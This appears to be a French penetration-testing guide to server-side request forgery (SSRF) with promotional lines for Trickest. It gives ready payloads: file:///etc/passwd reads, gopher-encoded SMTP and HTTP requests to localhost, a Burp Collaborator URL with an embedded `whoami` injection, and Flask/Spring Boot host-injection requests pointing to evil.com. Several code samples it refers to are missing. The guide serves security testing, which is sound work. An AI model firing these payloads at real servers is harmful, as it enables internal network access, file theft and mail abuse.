Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui à :
Une vulnérabilité de Server-side Request Forgery (SSRF) se produit lorsqu'un attaquant manipule une application côté serveur pour effectuer des requêtes HTTP vers un domaine de son choix. Cette vulnérabilité expose le serveur à des requêtes externes arbitraires dirigées par l'attaquant.
Capture SSRF
La première chose à faire est de capturer une interaction SSRF générée par vous. Pour capturer une interaction HTTP ou DNS, vous pouvez utiliser des outils tels que :
Généralement, vous constaterez que le SSRF ne fonctionne que dans des domaines ou URL spécifiques autorisés. Sur la page suivante, vous trouverez une compilation de techniques à essayer pour contourner cette liste blanche :
Contournement via redirection ouverte
Si le serveur est correctement protégé, vous pourriez contourner toutes les restrictions en exploitant une redirection ouverte à l'intérieur de la page web. Comme la page web autorisera le SSRF vers le même domaine et suivra probablement les redirections, vous pouvez exploiter la redirection ouverte pour amener le serveur à accéder à n'importe quelle ressource interne.
En savoir plus ici : https://portswigger.net/web-security/ssrf
Protocoles
file://
Le schéma d'URL file:// est référencé, pointant directement vers /etc/passwd : file:///etc/passwd
dict://
Le schéma d'URL DICT est décrit comme étant utilisé pour accéder à des définitions ou des listes de mots via le protocole DICT. Un exemple donné illustre une URL construite ciblant un mot spécifique, une base de données et un numéro d'entrée, ainsi qu'une instance d'un script PHP potentiellement utilisé de manière abusive pour se connecter à un serveur DICT en utilisant des identifiants fournis par l'attaquant : dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>
SFTP://
Identifié comme un protocole de transfert de fichiers sécurisé via shell sécurisé, un exemple est fourni montrant comment un script PHP pourrait être exploité pour se connecter à un serveur SFTP malveillant : url=sftp://generic.com:11111/
TFTP://
Le protocole Trivial File Transfer Protocol, fonctionnant sur UDP, est mentionné avec un exemple d'un script PHP conçu pour envoyer une requête à un serveur TFTP. Une requête TFTP est envoyée à 'generic.com' sur le port '12346' pour le fichier 'TESTUDPPACKET' : ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
LDAP://
Ce segment couvre le protocole Lightweight Directory Access Protocol, en soulignant son utilisation pour gérer et accéder à des services d'annuaire distribués sur des réseaux IP. Interagissez avec un serveur LDAP en local : '%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.
SMTP
Une méthode est décrite pour exploiter les vulnérabilités SSRF pour interagir avec les services SMTP en local, y compris les étapes pour révéler les noms de domaine internes et les actions d'investigation supplémentaires basées sur ces informations.
From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail
3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
4. connect
Curl URL globbing - Contournement de WAF
Si le SSRF est exécuté par curl, curl dispose d'une fonctionnalité appelée URL globbing qui pourrait être utile pour contourner les WAF. Par exemple, dans ce writeup, vous pouvez trouver cet exemple de traversal de chemin via le protocole file:
La capacité du protocole Gopher à spécifier l'IP, le port et les octets pour la communication avec le serveur est discutée, aux côtés d'outils comme Gopherus et remote-method-guesser pour la création de charges utiles. Deux utilisations distinctes sont illustrées :
Gopher://
En utilisant ce protocole, vous pouvez spécifier l'IP, le port et les octets que vous souhaitez que le serveur envoie. Ensuite, vous pouvez essentiellement exploiter une SSRF pour communiquer avec n'importe quel serveur TCP (mais vous devez savoir comment parler au service en premier lieu).
Heureusement, vous pouvez utiliser Gopherus pour créer des charges utiles pour plusieurs services. De plus, remote-method-guesser peut être utilisé pour créer des charges utiles gopher pour les services Java RMI.
Gopher smtp
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT
Gopher HTTP
#For new lines you can use %0A, %0D%0Agopher://<server>:8080/_GET /HTTP/1.0%0A%0Agopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
Les logiciels d'analyse sur les serveurs enregistrent souvent l'en-tête Referrer pour suivre les liens entrants, une pratique qui expose involontairement les applications aux vulnérabilités de falsification de requête côté serveur (SSRF). Cela est dû au fait que de tels logiciels peuvent visiter des URL externes mentionnées dans l'en-tête Referrer pour analyser le contenu du site de référence. Pour découvrir ces vulnérabilités, le plugin Burp Suite "Collaborator Everywhere" est recommandé, en exploitant la manière dont les outils d'analyse traitent l'en-tête Referer pour identifier les surfaces d'attaque SSRF potentielles.
SSRF via les données SNI du certificat
Une mauvaise configuration qui pourrait permettre la connexion à n'importe quel backend via une configuration simple est illustrée avec un exemple de configuration Nginx :
Dans cette configuration, la valeur du champ Server Name Indication (SNI) est directement utilisée comme adresse du backend. Cette configuration expose une vulnérabilité à la falsification de requête côté serveur (SSRF), qui peut être exploitée en spécifiant simplement l'adresse IP ou le nom de domaine souhaité dans le champ SNI. Un exemple d'exploitation pour forcer une connexion à un backend arbitraire, tel que internal.host.com, en utilisant la commande openssl, est donné ci-dessous:
Il pourrait être intéressant d'essayer une charge utile comme: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`
Rendu de PDF
Si la page web crée automatiquement un PDF avec des informations que vous avez fournies, vous pouvez insérer du JS qui sera exécuté par le créateur de PDF lui-même (le serveur) lors de la création du PDF et vous pourrez abuser d'un SSRF. Trouvez plus d'informations ici.
De SSRF à DoS
Créez plusieurs sessions et essayez de télécharger des fichiers lourds en exploitant le SSRF à partir des sessions.
Fonctions PHP SSRF
SSRF Rediriger vers Gopher
Pour certaines exploitations, vous pourriez avoir besoin de envoyer une réponse de redirection (potentiellement pour utiliser un protocole différent comme gopher). Voici différents codes python pour répondre avec une redirection:
Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui à :
</details>
Flask permet d'utiliser **`@`** comme caractère initial, ce qui permet de faire du **nom d'hôte initial le nom d'utilisateur** et d'injecter un nouveau. Requête d'attaque :
```http
GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close
Spring Boot
Code vulnérable :
Il a été découvert qu'il est possible de commencer le chemin d'une requête avec le caractère ; ce qui permet ensuite d'utiliser @ et d'injecter un nouvel hôte pour y accéder. Requête d'attaque :
GET ;@evil.com/url HTTP/1.1Host:target.comConnection:close